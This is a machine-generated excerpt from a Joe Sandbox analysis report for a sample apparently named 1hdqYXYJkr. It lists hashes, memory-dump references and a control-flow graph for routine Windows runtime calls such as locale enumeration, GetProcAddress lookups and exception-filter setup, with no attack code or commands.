                          • Instruction Fuzzy Hash: FA21BE72664206ABDB289F64DD42BBB73ECEF84300F10007AFD06C6141FB35AE818B50
                          APIs
                            • Part of subcall function 00962E60: GetLastError.KERNEL32(?,00000008,0096345F,?,?,00953CB9,009FA41C,?,?,009529CB,?,?,?,?,?,0095139A), ref: 00962E64
                            • Part of subcall function 00962E60: SetLastError.KERNEL32(00000000), ref: 00962F06
                          • EnumSystemLocalesW.KERNEL32(0096B74B,00000001,00000000,?,-00000050,?,0096BD7C,00000000,?,?,?,00000055,?), ref: 0096B697
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID: ErrorLast$EnumLocalesSystem
                          • String ID:
                          • API String ID: 2417226690-0
                          • Opcode ID: 973bbc47665a0fed82d13e90e77216c3702236479db3f027327bf39651d414fd
                          • Instruction ID: cf398a15e81e0e0da518388d7a9659219c377b60c913d4287872f95b9f507c9a
                          • Opcode Fuzzy Hash: 973bbc47665a0fed82d13e90e77216c3702236479db3f027327bf39651d414fd
                          • Instruction Fuzzy Hash: C911C23B2047059FDB189F39C8A16BAB796FB80768B19442DE94687A40E771A982C750
                          APIs
                            • Part of subcall function 00962E60: GetLastError.KERNEL32(?,00000008,0096345F,?,?,00953CB9,009FA41C,?,?,009529CB,?,?,?,?,?,0095139A), ref: 00962E64
                            • Part of subcall function 00962E60: SetLastError.KERNEL32(00000000), ref: 00962F06
                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0096B967,00000000,00000000,?), ref: 0096BBF9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID: ErrorLast$InfoLocale
                          • String ID:
                          • API String ID: 3736152602-0
                          • Opcode ID: b423390c50eced51d2b9b5f6019ad4259b383c2de54872c27f395bdd1e49452d
                          • Instruction ID: a0b82870ceadb4ca84c083ba01a1f8781763c8a902411878bdf8aaf68df3c1c0
                          • Opcode Fuzzy Hash: b423390c50eced51d2b9b5f6019ad4259b383c2de54872c27f395bdd1e49452d
                          • Instruction Fuzzy Hash: 44F0A433614119ABDB285B29C846BBB7768EB80754F550429ED86E3180FF78FE81C6E0
                          APIs
                            • Part of subcall function 00962E60: GetLastError.KERNEL32(?,00000008,0096345F,?,?,00953CB9,009FA41C,?,?,009529CB,?,?,?,?,?,0095139A), ref: 00962E64
                            • Part of subcall function 00962E60: SetLastError.KERNEL32(00000000), ref: 00962F06
                          • EnumSystemLocalesW.KERNEL32(0096B99E,00000001,00000000,?,-00000050,?,0096BD40,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0096B70A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID: ErrorLast$EnumLocalesSystem
                          • String ID:
                          • API String ID: 2417226690-0
                          • Opcode ID: 32472cd5f7a31c6bfdd165870a54bcb203f0ee523f6fdf69135c154b53839a1c
                          • Instruction ID: 784285088e6888466874bb4d19ec94b039afed87f260aff901580a6f2f360003
                          • Opcode Fuzzy Hash: 32472cd5f7a31c6bfdd165870a54bcb203f0ee523f6fdf69135c154b53839a1c
                          • Instruction Fuzzy Hash: AAF0C2362043085FDB245F35D881A7A7B95FBC0768F19442DFA45CBA80E7B1AC828660
                          APIs
                            • Part of subcall function 0095DBF8: EnterCriticalSection.KERNEL32(?,?,0096319F,?,00979C00,0000000C), ref: 0095DC07
                          • EnumSystemLocalesW.KERNEL32(Function_000136D8,00000001,00979C20,0000000C,00963B07,?), ref: 0096371D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID: CriticalEnterEnumLocalesSectionSystem
                          • String ID:
                          • API String ID: 1272433827-0
                          • Opcode ID: 951bbb417af21a4f2e6fb3653e5bba2aad790d4544811bc127b83ec98416ecdc
                          • Instruction ID: e38a148d4a696662355e90faa61fb71f4093fb96a0b10d1993ab7ca7f3634a70
                          • Opcode Fuzzy Hash: 951bbb417af21a4f2e6fb3653e5bba2aad790d4544811bc127b83ec98416ecdc
                          • Instruction Fuzzy Hash: B3F037B6A14204EFDB00DF98E842BAE77F0EB88722F10802AE8149B3A0DB755944DB50
                          APIs
                            • Part of subcall function 00962E60: GetLastError.KERNEL32(?,00000008,0096345F,?,?,00953CB9,009FA41C,?,?,009529CB,?,?,?,?,?,0095139A), ref: 00962E64
                            • Part of subcall function 00962E60: SetLastError.KERNEL32(00000000), ref: 00962F06
                          • EnumSystemLocalesW.KERNEL32(0096B533,00000001,00000000,?,?,0096BD9E,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0096B611
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID: ErrorLast$EnumLocalesSystem
                          • String ID:
                          • API String ID: 2417226690-0
                          • Opcode ID: 4c29750e092a65f18c964b1b56d035c876622da1a62d45b7707591e62ac469c9
                          • Instruction ID: bd43143c32b3b5ec0ee84785084e5f9693b00b9e6351ab2f905e62e9289ce23c
                          • Opcode Fuzzy Hash: 4c29750e092a65f18c964b1b56d035c876622da1a62d45b7707591e62ac469c9
                          • Instruction Fuzzy Hash: 1AF0E53670420957CB149F35D8457BABF98EFC1B64F4A4069FE0ACB250E7729882D7A0
                          APIs
                          • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00962574,?,20001004,00000000,00000002,?,?,00961B76), ref: 00963C3F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID: InfoLocale
                          • String ID:
                          • API String ID: 2299586839-0
                          • Opcode ID: cee4dfbc3060b83272c6c69a881e0913753ed066e01a54e2792f7b214ce25a22
                          • Instruction ID: c3ad6012927008093152f1f2a1d0b7f1cc5513a4980eac7f912a737cf88caf60
                          • Opcode Fuzzy Hash: cee4dfbc3060b83272c6c69a881e0913753ed066e01a54e2792f7b214ce25a22
                          • Instruction Fuzzy Hash: 4BE0863250812CFBCF122F61DD09F9E7F2AEF84761F008011FC4565161CB768E60AAD0
                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32(Function_00008F66,0095893C), ref: 00958F5F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          • Opcode ID: 35b47e85b1b73e30ca16a810e26dae812e19f848e3d7b4671eddb1531375f03d
                          • Instruction ID: 797a2bcf34579c2ae7f5eb5b1b2f4a3c78d1ef05bf33d11f0021a913f2cdc48b
                          • Opcode Fuzzy Hash: 35b47e85b1b73e30ca16a810e26dae812e19f848e3d7b4671eddb1531375f03d
                          • Instruction Fuzzy Hash:
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID: HeapProcess
                          • String ID:
                          • API String ID: 54951025-0
                          • Opcode ID: 86f215d508164773e8926de740ccf57125d14cf5406c387f584986ce82703e94
                          • Instruction ID: 1abff87ed260bd511520663a9164f4a69b5e99efa659e26a625380f793c1327a
                          • Opcode Fuzzy Hash: 86f215d508164773e8926de740ccf57125d14cf5406c387f584986ce82703e94
                          • Instruction Fuzzy Hash: A2A0113022E208CB83008F30AE0820A3AA8BA88AC0B008028A008C2020EBA08080AA00
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
                          • Instruction ID: 01c80dd39e151df92b115da2693a1a8f2df31cbef649e1215f6dcf0b0e13eb96
                          • Opcode Fuzzy Hash: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
                          • Instruction Fuzzy Hash: 8F81B031604B058FC728DF29D8947AABBE2EFD5314F148A2DD4EA87791D734E849CB44
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3be818cf205956922cb42e2948fb7e1fdd6f2e0da355ec83d9b6a1afa0c5ae1d
                          • Instruction ID: e7b88269382302d4adfc4702ae0c161e7b140452acb9cf5c25626a54aea6fad4
                          • Opcode Fuzzy Hash: 3be818cf205956922cb42e2948fb7e1fdd6f2e0da355ec83d9b6a1afa0c5ae1d
                          • Instruction Fuzzy Hash: E4E08C32D11228EBCB25DB88D904A8AF3ECEB88B40B11819AF501D3101C270DF00CBE0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e8f6b386abd769ad1aa34007715f148021cb4ecf1aa09ef3fb483fba9ae76088
                          • Instruction ID: 6a804f04f75bea298c4b8802e6f7a24f9fea52cb944baae3e998cd100a1d124f
                          • Opcode Fuzzy Hash: e8f6b386abd769ad1aa34007715f148021cb4ecf1aa09ef3fb483fba9ae76088
                          • Instruction Fuzzy Hash: FEC08C34002A008BCE2A891692B53A63358E3E2786F84088DE4030B642C61EEC82DA10

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 133 9583ae-9583f2 GetModuleHandleW GetProcAddress * 3
                          APIs
                          • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 009583B4
                          • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 009583C2
                          • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 009583D3
                          • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 009583E4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID: AddressProc$HandleModule
                          • String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                          • API String ID: 667068680-1247241052
                          • Opcode ID: 0c62fdf2d36796b5facdf842f4334aadc04c4d0b830f476c00352627cd7b7898
                          • Instruction ID: c91ea7d3fba8454d64f6d14a630196c6f81b9741c4c895f05d1c2dc1821d0d44
                          • Opcode Fuzzy Hash: 0c62fdf2d36796b5facdf842f4334aadc04c4d0b830f476c00352627cd7b7898
                          • Instruction Fuzzy Hash: 4FE0E6B357A310DB87109FB4BC0ED563EB4FAC97A53018011F40DD31A0E6B04481EB65

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 134 95bd42-95bd6d call 95cc75 137 95c0e1-95c0e6 call 95d05b 134->137 138 95bd73-95bd76 134->138 138->137 139 95bd7c-95bd85 138->139 141 95be82-95be88 139->141 142 95bd8b-95bd8f 139->142 145 95be90-95be9e 141->145 142->141 144 95bd95-95bd9c 142->144 146 95bdb4-95bdb9 144->146 147 95bd9e-95bda5 144->147 148 95bea4-95bea8 145->148 149 95c04a-95c04d 145->149 146->141 151 95bdbf-95bdc7 call 95b9c6 146->151 147->146 150 95bda7-95bdae 147->150 148->149 154 95beae-95beb5 148->154 152 95c070-95c079 call 95b9c6 149->152 153 95c04f-95c052 149->153 150->141 150->146 166 95bdcd-95bde6 call 95b9c6 * 2 151->166 167 95c07b-95c07f 151->167 152->137 152->167 153->137 159 95c058-95c06d call 95c0e7 153->159 155 95beb7-95bebe 154->155 156 95becd-95bed3 154->156 155->156 160 95bec0-95bec7 155->160 161 95bed9-95bf00 call 959a2e 156->161 162 95bfea-95bfee 156->162 159->152 160->149 160->156 161->162 177 95bf06-95bf09 161->177 170 95bff0-95bff9 call 959df1 162->170 171 95bffa-95c006 162->171 166->137 192 95bdec-95bdf2 166->192 170->171 171->152 175 95c008-95c012 171->175 179 95c014-95c016 175->179 180 95c020-95c022 175->180 185 95bf0c-95bf21 177->185 179->152 181 95c018-95c01c 179->181 183 95c024-95c037 call 95b9c6 * 2 180->183 184 95c039-95c046 call 95c72d 180->184 181->152 186 95c01e 181->186 210 95c080 call 95db7b 183->210 201 95c0a5-95c0ba call 95b9c6 * 2 184->201 202 95c048 184->202 189 95bf27-95bf2a 185->189 190 95bfcb-95bfde 185->190 186->183 189->190 195 95bf30-95bf38 189->195 190->185 194 95bfe4-95bfe7 190->194 197 95bdf4-95bdf8 192->197 198 95be1e-95be26 call 95b9c6 192->198 194->162 195->190 200 95bf3e-95bf52 195->200 197->198 203 95bdfa-95be01 197->203 220 95be28-95be48 call 95b9c6 * 2 call 95c72d 198->220 221 95be8a-95be8d 198->221 205 95bf55-95bf66 200->205 228 95c0bc 201->228 229 95c0bf-95c0dc call 959c1a call 95c62d call 95c7c7 call 95c5a4 201->229 202->152 208 95be15-95be18 203->208 209 95be03-95be0a 203->209 211 95bf8c-95bf99 205->211 212 95bf68-95bf79 call 95c21d 205->212 208->137 208->198 209->208 218 95be0c-95be13 209->218 224 95c085-95c0a0 call 959df1 call 955664 call 9599c2 210->224 211->205 216 95bf9b 211->216 231 95bf9d-95bfc5 call 95bcc2 212->231 232 95bf7b-95bf84 212->232 223 95bfc8 216->223 218->198 218->208 220->221 248 95be4a-95be4f 220->248 221->145 223->190 224->201 228->229 229->137 231->223 232->212 233 95bf86-95bf89 232->233 233->211 248->210 250 95be55-95be68 call 95c3b6 248->250 250->224 255 95be6e-95be7a 250->255 255->210 256 95be80 255->256 256->250
                          APIs
                          • type_info::operator==.LIBVCRUNTIME ref: 0095BE61
